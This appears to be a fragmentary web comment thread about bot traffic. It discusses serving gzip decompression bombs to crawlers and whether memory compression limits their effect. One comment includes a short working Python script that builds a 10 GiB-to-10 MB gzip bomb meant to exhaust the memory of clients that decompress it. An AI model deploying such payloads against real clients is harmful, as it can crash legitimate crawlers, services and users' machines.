The majority of the traffic on the web is from bots. For the most part, these bots are used to discover new content: RSS feed readers, search engines crawling your content, or, nowadays, AI bots.
No, but that’s an interesting question. Ultimately it probably comes down to hardware specs, or, depending on the particular bot and its environment, the specs of the container it’s running in.
Even with macOS’s style of compressing inactive memory pages, you’ll still have a hard cap that can be reached with the same technique (just with a larger uncompressed file).
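
For concreteness, here’s a minimal Python sketch of the kind of payload being discussed; the filename and sizes are arbitrary, not from the article:

    import gzip

    # Hypothetical sketch: build a gzip "bomb" whose uncompressed size
    # dwarfs its on-disk size. Runs of zeros compress at roughly 1000:1,
    # so 10 GiB of zeros lands around 10 MB compressed. A client that
    # naively decompresses the whole body in memory will try to allocate
    # the full 10 GiB.
    CHUNK = b"\0" * (1024 * 1024)   # 1 MiB of zeros per write
    TOTAL_MIB = 10 * 1024           # 10 GiB uncompressed

    with gzip.open("bomb.gz", "wb", compresslevel=9) as f:
        for _ in range(TOTAL_MIB):
            f.write(CHUNK)

Making the uncompressed side larger barely changes the compressed size, which is why compressed-memory schemes only move the cap rather than remove it.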
How long would it take for a page to be considered inactive? Do OOM conditions immediately trigger compression, or would the process die first?